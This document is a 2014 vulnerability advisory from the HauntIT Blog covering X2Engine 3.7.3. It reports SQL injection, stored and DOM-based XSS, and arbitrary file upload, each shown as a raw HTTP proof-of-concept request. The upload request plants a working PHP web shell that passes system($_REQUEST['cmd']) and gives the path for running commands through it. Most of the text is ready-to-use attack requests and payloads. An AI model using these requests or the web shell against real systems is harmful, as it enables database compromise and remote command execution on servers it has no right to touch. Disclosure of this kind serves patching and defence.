[EN] Multiple vulnerabilities in X2Engine

# ==============================================================
# Title ...| Multiple vulnerabilities in X2Engine
# Version .| X2Engine 3.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] For admin logged in

# ==============================================================
# 1. SQL Injection

---<request>---
GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1
Host: 10.149.14.62
(...)
Connection: close
---<request>---


Parameter "lastTimestamp" is also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 917

Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create
---<request>---

Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D...


# ==============================================================
# 3. Arbitrary File Upload


---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---

To access shell, go to:
http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id



# ==============================================================
# 4. DOM-based XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');</script><script>alert(1)</script>&langCode=en HTTP/1.1
Host: 10.149.14.62
(...) <!-- yes, I know. This is the same request as [3] ;)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---



# ==============================================================
# 5. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/docs/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 260

Docs%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(991212129)%3e&Docs%5Bvisibility%5D=1&yt0=Create&Docs%5Btext%5D=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3Eaaaaaaaaaaaaaaaa%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A
---<request>---




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/